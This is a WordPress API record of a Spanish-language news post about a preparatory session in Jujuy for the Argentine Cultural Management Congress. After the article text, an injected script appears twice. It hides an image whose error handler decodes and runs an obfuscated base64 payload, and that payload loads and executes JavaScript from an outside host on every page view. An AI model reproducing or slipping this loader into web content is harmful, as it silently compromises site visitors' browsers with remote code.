{"id":1364,"date":"2022-08-25T10:57:03","date_gmt":"2022-08-25T13:57:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1364"},"modified":"2025-08-14T00:37:32","modified_gmt":"2025-08-14T03:37:32","slug":"salta-se-prepara-para-participar-del-congreso-argentino-de-gestion-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1364","title":{"rendered":"Salta se prepara para participar del Congreso Argentino de Gesti\u00f3n Cultural"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#ba113b\">Este viernes 26, artistas y gestores culturales del Norte Grande se re\u00fanen en la Universidad Nacional de Jujuy para realizar la jornada preparatoria para el Congreso Argentino de Gesti\u00f3n Cultural.<\/h3>\n\n\n\n<p>Este viernes 26, a partir de las 15 H, en la Universidad Nacional de Jujuy (UNJu) se realiza la jornada preparatoria para el Congreso Argentino de Gesti\u00f3n Cultural organizado por la Red Argentina de Gesti\u00f3n Cultural y el Ministerio de Cultura de la Naci\u00f3n.<\/p>\n\n\n\n<p>La provincia estar\u00e1 representada por egresados en la Tecnicatura Superior en Gesti\u00f3n Socio-Cultural y se proyectar\u00e1 un audiovisual que da cuenta de la actividad cultural de trabajadores culturales en la provincia. El mismo refleja el accionar de todo el sector que comprende productores, artistas y gestores en general.<\/p>\n\n\n\n<p>La tem\u00e1tica del Congreso invita a pensar en los desaf\u00edos de la Gesti\u00f3n Cultural en la Argentina del siglo XXI, pol\u00edticas culturales y territorio, a partir de la tr\u00edada investigaci\u00f3n, gesti\u00f3n-producci\u00f3n y legislaci\u00f3n.<\/p>\n\n\n\n<p>El principal objetivo ser\u00e1 intercambiar visiones, experiencias, ideas, discutir conceptos que sustentan nuestras pr\u00e1cticas y ponerlos en juego en la confrontaci\u00f3n y el debate, as\u00ed como avanzar en la construcci\u00f3n del porvenir que deseamos.<\/p>\n\n\n\n<p>Cabe recordar que el Congreso Argentino, se realizar\u00e1 del 3 al 5 de noviembre en la Universidad de Avellaneda. Las jornadas preparatorias se realizaron en diferentes puntos del pa\u00eds. Ya se desarrollaron en General Roca, La Plata y C\u00f3rdoba.<\/p>\n\n\n\n<p>Est\u00e1n invitados los y las profesionales de la gesti\u00f3n cultural (tanto del \u00e1mbito p\u00fablico como privado), estudiantes y p\u00fablico en general al espacio de di\u00e1logo, debate y reflexi\u00f3n.<\/p>\n\n\n\n<p>El Congreso Nacional de Gesti\u00f3n Cultural est\u00e1 organizado por el Ministerio de Cultura de la Naci\u00f3n, el Instituto Cultural de la Provincia de Buenos Aires y la Red Argentina de Gesti\u00f3n Cultural. El mismo se llevar\u00e1 a cabo en el mes de noviembre y tendr\u00e1 sede en la Universidad Nacional de Avellaneda. Su objetivo es la reflexi\u00f3n y el intercambio en torno al rol de las gestoras y los gestores del \u00e1mbito de la cultura, los recorridos pedag\u00f3gicos y la profesionalizaci\u00f3n. Esta instancia representa un hito en la valorizaci\u00f3n de la actividad que miles realizamos dentro de los procesos culturales. Ser\u00e1 tambi\u00e9n una oportunidad para que los beneficiarios de los programas de la Secretar\u00eda, tanto los beneficiarios del programa Gestionar Futuro como los participantes de diferentes instancias de formaci\u00f3n surgidas en el marco del Formar Cultura, profundicen las redes de cooperaci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este viernes 26, artistas y gestores culturales del Norte Grande se re\u00fanen en la Universidad Nacional de Jujuy para realizar la jornada preparatoria para el Congreso Argentino de Gesti\u00f3n Cultural. Este viernes 26, a partir de las 15 H, en la Universidad Nacional de Jujuy (UNJu) se realiza la jornada preparatoria para el Congreso Argentino [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1365,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-1364","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1364"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1364"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions"}],"predecessor-version":[{"id":7380,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions\/7380"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1365"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1364"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}